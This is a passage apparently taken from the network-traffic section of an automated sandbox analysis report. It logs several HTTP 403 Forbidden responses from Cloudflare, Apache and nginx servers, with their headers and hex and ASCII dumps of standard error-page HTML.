20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VgR5Sl7H1PFEzB3YWc8Zv19qQIYNcmzM%2FLZOMq4XmoeTx%2B8aIxdd291FmTZgIDtwB0xv7JprbC48gaTRktA%2B0YNK9Bc3lrWoNHACqWLsKauJ5lvpBkRdrZ48OwG5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a83da95a9a05-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 62 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f Data Ascii: 1b3b<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robo
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:20 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XlhIed4vCaKewrZAWsmPuhFhhmhQ%2B3IAfEBKj7K1p4kx43sMwRn0HmunIefsWv4P66wxHG%2FpMnrJWyhDRlCBjiEvSJeYSx96rUKnc7yE0KySy%2FTwtGwHZRJa0ZY0lno%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a83cc88291dd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:20 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: tHzHG6QeSsyukPkElY9D5KnPWIDxfKj16yM6xXYJ3IE=,GXNXSWFXisshliUcwO20Naon851uhK6HRsxREnrEO9Y+DYuMfmtB4kgQ8tW/ClTAmuOkfcTSJaUOHlD2KQbqrA==,m0j2EEknGIVUW/liY8BLLhZ4wvHcBCgqBuXgRA8LPTYm++C2XkuTvnlRFg2XiSDLX-Wix-Request-Id: 1678431380.170873863951123643X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><cente
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:20 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:20 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:56:20 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:20 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:20 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
